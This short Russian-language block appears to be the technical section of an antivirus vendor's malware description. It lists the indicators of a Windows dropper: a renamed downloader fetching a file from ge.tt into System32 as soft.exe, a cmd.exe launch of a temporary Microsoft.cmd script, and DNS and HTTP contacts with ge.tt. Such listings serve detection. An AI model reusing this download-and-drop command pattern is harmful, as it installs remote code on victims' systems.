Техническая информация
- <SYSTEM32>\soft.exe
- %TEMP%\1.tmp\sof.exe http://ge.tt/api/1/files/54FrsNO/0/blob?do###### -O <SYSTEM32>\soft.exe
- <SYSTEM32>\soft.exe (загружен из сети Интернет)
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\Microsoft.cmd" "
- <SYSTEM32>\soft.exe
- %TEMP%\1.tmp\sof.exe
- %TEMP%\1.tmp\Microsoft.cmd
- %TEMP%\1.tmp\Microsoft.cmd
- %TEMP%\1.tmp\sof.exe
- 'ge.tt':80
- ge.tt/api/1/files/54FrsNO/0/blob?do######
- DNS ASK ge.tt